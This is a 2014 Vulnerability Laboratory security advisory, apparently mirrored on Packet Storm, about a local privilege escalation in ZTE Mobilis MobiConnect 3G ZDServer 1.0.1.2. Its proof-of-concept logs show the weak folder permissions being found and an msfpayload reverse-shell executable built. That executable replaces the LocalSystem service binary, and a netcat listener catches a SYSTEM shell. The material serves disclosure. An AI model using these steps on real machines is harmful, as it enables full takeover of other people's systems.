what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mobilis MobiConnect 3G ZDServer 1.0.1.2 Privilege Escalation

Mobilis MobiConnect 3G ZDServer 1.0.1.2 Privilege Escalation
Posted Dec 20, 2014
Authored by Hadji Samir, Vulnerability Laboratory | Site vulnerability-lab.com

Mobilis MobiConnect 3G ZDServer version 1.0.1.2 suffers from a privilege escalation vulnerability.

tags | exploit
SHA-256 | 6c74b1f6e37725e0c1ac37c1c232da750e8669314683cec2a7bc5be5684e7c8d

Mobilis MobiConnect 3G ZDServer 1.0.1.2 Privilege Escalation

Change Mirror Download
Document Title:
===============
Mobilis MobiConnect 3G ZDServer v1.0.1.2 - Privilege Escalation Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1385


Release Date:
=============
2014-12-19


Vulnerability Laboratory ID (VL-ID):
====================================
1385


Common Vulnerability Scoring System:
====================================
6.4


Product & Service Introduction:
===============================
http://www.3G.dz
http://wwwen.zte.com.cn/en


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a local privilege escalation vulnerability in the official ZTE Mobilis 3g MobiConnect 3G++ ZDServer v1.0.1.2 software.


Vulnerability Disclosure Timeline:
==================================
2014-12-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
ZTE Corporation
Product: Mobilis 3g MobiConnect 3G++ ZDServer - Software 1.0.1.2


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local privilege escalation vulnerability has been discovered in the official ZTE Mobilis 3g MobiConnect 3G++ ZDServer v1.0.1.2 software.
The local security vulnerability allows an attackers to gain higher access privileges by execution of arbitrary codes.

The vulnerability could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
of the application.

The security risk of the privilege escalation vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Exploitation of
the vulnerability requires a local privileged systen user account without user for interaction. Successful exploitation of the privilege escalation web
vulnerability results in software- or system compromise.


Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with restricted system privileges and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


--- PoC Session Logs ---
C:\Users\s-dz>sc qc ZDServ
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: ZDServ
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ZDServ
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:\Users\s-dz\Desktop>net users s-dz
Nom d'utilisateur s-dz
Nom complet s-dz
Commentaire
Commentaires utilisateur
Code du pays 000 (Valeur par défaut du système)
Compte : actif Oui
Le compte expire Jamais

Mot de passe : dernier changmt. 18/12/2014 00:58:48
Le mot de passe expire Jamais
Le mot de passe modifiable 18/12/2014 00:58:48
Mot de passe exigé Oui
L'utilisateur peut changer de mot de passe Oui

Stations autorisées Tout
Script d'ouverture de session
Profil d'utilisateur
Répertoire de base
Dernier accès 17/12/2014 22:54:46

Heures d'accès autorisé Tout

Appartient aux groupes locaux *Utilisateurs
Appartient aux groupes globaux *None
La commande s'est terminée correctement.


C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\ProgramData\ZDSupport\ZDServ\"
C:\ProgramData\ZDSupport\ZDServ
Medium Mandatory Level (Default) [No-Write-Up]
RW Tout le monde
FILE_ALL_ACCESS
RW AUTORITE NT\SystÞme
FILE_ALL_ACCESS
RW BUILTIN\Administrateurs
FILE_ALL_ACCESS
RW BUILTIN\Utilisateurs
FILE_ADD_FILE
FILE_ADD_SUBDIRECTORY
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_EA
FILE_TRAVERSE
FILE_WRITE_ATTRIBUTES
FILE_WRITE_EA
SYNCHRONIZE
READ_CONTROL


C:\Users\s-dz\Desktop>cacls "C:\ProgramData\ZDSupport\ZDServ\"
C:\ProgramData\ZDSupport\ZDServ Tout le monde:F
Tout le monde:(OI)(CI)(IO)F
AUTORITE NT\Système:(OI)(CI)(ID)F
BUILTIN\Administrateurs:(OI)(CI)(ID)F
CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F
BUILTIN\Utilisateurs:(OI)(CI)(ID)R
BUILTIN\Utilisateurs:(CI)(ID)(accès spécial :)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES


############## PROOF ######################
C:\Users\s-dz\Desktop>net user s-dz
Nom d'utilisateur s-dz
Nom complet s-dz
Commentaire
Commentaires utilisateur
Code du pays 000 (Valeur par défaut du système)
Compte : actif Oui
Le compte expire Jamais

Mot de passe : dernier changmt. 18/12/2014 01:12:55
Le mot de passe expire Jamais
Le mot de passe modifiable 18/12/2014 01:12:55
Mot de passe exigé Oui
L'utilisateur peut changer de mot de passe Oui

Stations autorisées Tout
Script d'ouverture de session
Profil d'utilisateur
Répertoire de base
Dernier accès 18/12/2014 03:16:07

Heures d'accès autorisé Tout

Appartient aux groupes locaux *Utilisateurs
Appartient aux groupes globaux *None
La commande s'est terminée correctement.

Before we go over to action we need to check the status of the ZDserv service. In this case we can see
it is set to "AUTO_START" so it will launch

C:\Windows\system32>sc qc ZDserv
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: ZDserv
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ZDServ
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem



root@samir:~# msfpayload windows/shell_reverse_tcp lhost='192.168.1.5' lport='4433' X > C:\Users\s-dz\Desktop\evil-ZDserv.exe



C:\Users\s-dz\Desktop>copy evil-ZDserv.exe C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe
Remplacer C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe (Oui/Non/Tous) : o
1 fichier(s) copié(s).

and later we will open cmd with administrator

C:\Windows\system32>sc start zdserv
###################################################################
C:\Users\s-dz\Desktop>nc.exe -lvp 4433
listening on [any] 4433 ...
connect to [192.168.1.5] from s-dz [192.168.1.5] 4638
Microsoft Windows [version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Tous droits réservés.

C:\Windows\system32>whoami
whoami
autorite nt\système

C:\Windows\system32>


Security Risk:
==============
The security risk of the local privilege escalation vulnerability in the software is estimated as high. (CVSS 6.4)


Credits & Authors:
==================
Hadji Samir S-dz@hotmail.fr


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™


--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close